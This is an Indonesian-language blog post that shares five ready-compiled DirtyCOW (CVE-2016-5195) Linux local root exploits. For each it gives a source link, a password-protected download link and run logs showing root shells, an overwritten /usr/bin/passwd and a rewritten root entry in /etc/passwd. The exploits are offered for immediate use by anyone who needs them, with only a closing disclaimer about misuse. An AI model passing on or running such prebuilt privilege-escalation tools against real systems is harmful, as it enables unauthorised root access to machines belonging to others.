CVE-2016-5195 (DirtyCOW) Privilege Escalation Exploit
Jumat, 14 Oktober 2016
Add Comment
CVE-2016-5195 (DirtyCOW) Privilege Escalation Exploit - Hai Semua, selamat datang di blog Noob1t4, Pada Artikel yang kalian baca kali ini dengan judul CVE-2016-5195 (DirtyCOW) Privilege Escalation Exploit, kami telah mempersiapkan artikel ini dengan baik untuk kalian baca dan ambil informasi didalamnya. mudah-mudahan isi postingan yang kami tulis ini dapat kalian pahami. baiklah, selamat membaca.
Sumber http://noob1t4.blogspot.com/
Sekian Artikel CVE-2016-5195 (DirtyCOW) Privilege Escalation Exploit.
Yooo.. kali ini mau share koleksi localroot dirtycow aja. barangkali ada yang butuh atau error saat compile. Soalnya yang saya share ini versi compile jadi tinggal pakai.
1. naughtyc0w
Source : https://gist.github.com/mak/c36136ccdbebf5ecfefd80c0f2ed6747
Download File : https://goo.gl/r1CnDT (password : linuxsec)
logs :
./naughty 0
[*] let make some c0ws dirty
[+] ok we have some dirty things going on
2. c0w
Source : https://gist.github.com/KrE80r/42f8629577db95782d5e4f609f437a54
Download File 64bit : https://goo.gl/5N9JOs (password : linuxsec)
Download File 32bit : https://goo.gl/iNFH30 (password : linuxsec)
logs :
./c0w
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
mmap fa65a000madvise 0ptrace 0
$ /usr/bin/passwd
[root@server foo]# whoami
root
[root@server foo]# id
uid=0(root) gid=501(foo) groups=501(foo)
3. dcow
Source : https://github.com/gbonacini/CVE-2016-5195
Download File : https://goo.gl/71lKdt (password : linuxsec)
logs :
./dcow -s
Running …
Root password is: dirtyCowFun
Received su prompt (Password: )
[root@server foo]# whoami
root
4. cowroot
Source : https://gist.github.com/rverton/e9d4ff65d703a9084e85fa9df083c679
Download File : https://goo.gl/kELZXw (password : linuxsec)
logs :
./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 27832
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd overwritten
Popping root shell.
Don’t forget to restore /tmp/bak
[root@server public_html]# whoami
root
5. dirty
Source : https://github.com/FireFart/dirtycow/blob/master/dirty.c
Download File : https://drive.google.com/open?id=0B5gYDnh1l7hXbzlnYzJpb3lzX2c (password : linuxsec)
logs :
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: linuxsec
Complete line:
root:fiDHk6SmQq4KQ:0:0:pwned:/root:/bin/bash
mmap: 7f2e24495000
madvise 0
ptrace 0
..
Oke sekian artikel kali ini, kalo ada yang kurang jelas komen aja.
Sumber http://noob1t4.blogspot.com/
Sekian Artikel CVE-2016-5195 (DirtyCOW) Privilege Escalation Exploit.
Terima kasih telah membaca artikel CVE-2016-5195 (DirtyCOW) Privilege Escalation Exploit, mudah-mudahan bisa memberi manfaat untuk kalian semua. Baiklah, sampai jumpa di postingan artikel lainnya.
Semua artikel tutorial di blog ini hanya untuk sebatas Pembelajaran dan Pengetahuan saja, jika kalian meyalahgunakan tutorial di blog ini, itu bukan tanggung jawab saya. Terima kasih sudah berkunjung ke blog Noob1t4, saya harap agan berkunjung kembali kesini
0 Response to "CVE-2016-5195 (DirtyCOW) Privilege Escalation Exploit"
Posting Komentar